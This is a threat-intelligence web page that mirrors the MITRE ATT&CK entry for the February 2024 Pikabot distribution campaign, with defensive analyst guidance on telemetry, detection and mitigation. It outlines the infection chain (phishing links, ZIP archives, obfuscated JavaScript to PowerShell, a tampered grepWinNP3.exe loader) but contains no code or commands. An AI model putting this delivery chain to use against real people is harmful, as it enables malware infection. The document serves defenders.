Live Active security incident? Get immediate response
MITRE ATT&CK® Campaign

C0036: Pikabot Distribution February 2024

Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]

EnterpriseC0036CampaignObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This campaign matters because it shows a practical initial-access path: malicious email links leading users to download ZIP archives and interact with them, resulting in Pikabot distribution. For leaders, the decision point is not just “do we block malware,” but whether email, web, endpoint, and user-execution controls work together when the payload is link-delivered rather than attached directly to the message.

Executive priority

Prioritize this as an email-to-endpoint resilience scenario. The business risk is that a user-driven download chain can bypass attachment-focused controls and create follow-on incident response burden. Security leaders should ask whether the organization can prove coverage for malicious links, archive downloads, PowerShell or JavaScript execution, and suspicious execution-flow hijacking behavior, especially on Windows where the related Pikabot software is described.

Technical view

ATT&CK provides no campaign-level detection text, so validation should be built from the documented relationships: Spearphishing Link for initial access, PowerShell and JavaScript for execution, Hijack Execution Flow for stealth/execution, and Pikabot as the distributed software. SOC teams should test visibility across the full chain: inbound email containing links, URL click and web download activity, ZIP archive handling, user-launched execution, script interpreter activity, and endpoint behaviors consistent with execution-flow hijacking. Treat this as a coverage-mapping exercise rather than a single alert signature.

Likely telemetry

  • Email security gateway and mail platform logs for messages containing embedded links
  • URL click, browser, DNS, proxy, and secure web gateway logs for link access and ZIP downloads
  • Endpoint file creation and archive extraction events
  • Process creation telemetry for user-launched files, PowerShell, and JavaScript/JScript execution
  • Windows endpoint telemetry relevant to Pikabot-related execution behavior

Detection direction

  • Validate that link-based phishing is inspected, not only file attachments.
  • Correlate email-link clicks with subsequent ZIP downloads and endpoint execution events.
  • Tune for suspicious PowerShell and JavaScript execution in the context of recent email or web-download activity to reduce false positives from legitimate administration or development use.
  • Review detections for execution-flow hijacking behaviors, but expect environment-specific baselining because legitimate software can also load components dynamically.
  • Confirm whether Pikabot detections are mapped to the related software object and whether they depend on signatures, behavior, or both.

Mitigation priorities

  • Strengthen phishing and URL defenses for embedded links, including inspection of links that lead to downloaded archives.
  • Apply web controls and download policies for ZIP archives from untrusted sources where business-appropriate.
  • Improve user reporting and awareness around link-delivered archives requiring interaction.
  • Harden script execution controls and logging for PowerShell and JavaScript/JScript without disrupting approved administrative workflows.
  • Use application control or allow-listing strategies where feasible to reduce execution of untrusted downloaded content.
Analyst notes and limits

The supplied ATT&CK object documents a February 2024 Pikabot distribution campaign using malicious emails with embedded links to ZIP archives requiring user interaction. Relationship context adds the relevant ATT&CK techniques and Pikabot software association. This take intentionally focuses on defensive validation and control prioritization rather than attribution or claims of current activity.

Campaign-level platforms, tactics, and official detection guidance are not specified. Platform statements should therefore be limited to related objects, such as Pikabot being associated with Windows. Local telemetry, control configuration, and business-approved scripting use are required to determine actual exposure or coverage.

Official MITRE ATT&CK definition

Pikabot Distribution February 2024

Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

4 rows
Domain ID Name Relationship / procedure
Enterprise T1574 Hijack Execution Flow

Pikabot Distribution February 2024 utilized a tampered legitimate executable, `grepWinNP3.exe`, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched.CitationElastic Pikabot 2024
Enterprise T1059.007 JavaScript Sub-technique

Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.CitationElastic Pikabot 2024
Enterprise T1059.001 PowerShell Sub-technique

Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.CitationElastic Pikabot 2024
Enterprise T1566.002 Spearphishing Link Sub-technique

Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.CitationElastic Pikabot 2024
Associated objects

Groups, software, and campaigns

Malware Enterprise

S1145: Pikabot

Pikabot is a backdoor used for initial access and follow-on tool deployment active since early 2023. Pikabot is notable for extensive use of multiple encoding, encryption, and defense evasion mechanisms to evade defenses and avoid analysis. Pikabot has some overlaps with QakBot, but insufficient evidence exists to definitively link these two malware families. Pikabot is frequently used to deploy follow on tools such as Cobalt Strike or ransomware variants.[1][2][3]

Windows
Relationship explorer

All related ATT&CK context

uses · Technique T1574: Hijack Execution Flow Enterprise uses · Malware S1145: Pikabot Enterprise uses · Technique T1059.007: JavaScript Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1566.002: Spearphishing Link Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
3277aa2aedd7714a...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 3277aa2aedd7…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Elastic Pikabot 2024

    Daniel Stepanic & Salim Bitam. (2024, February 23). PIKABOT, I choose you!. Retrieved July 12, 2024.

    Open source URL
  2. [2]
    Zscaler Pikabot 2024

    Nikolaos Pantazopoulos. (2024, February 12). The (D)Evolution of Pikabot. Retrieved July 17, 2024.

    Open source URL
  3. [3]
    mitre-attack C0036
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use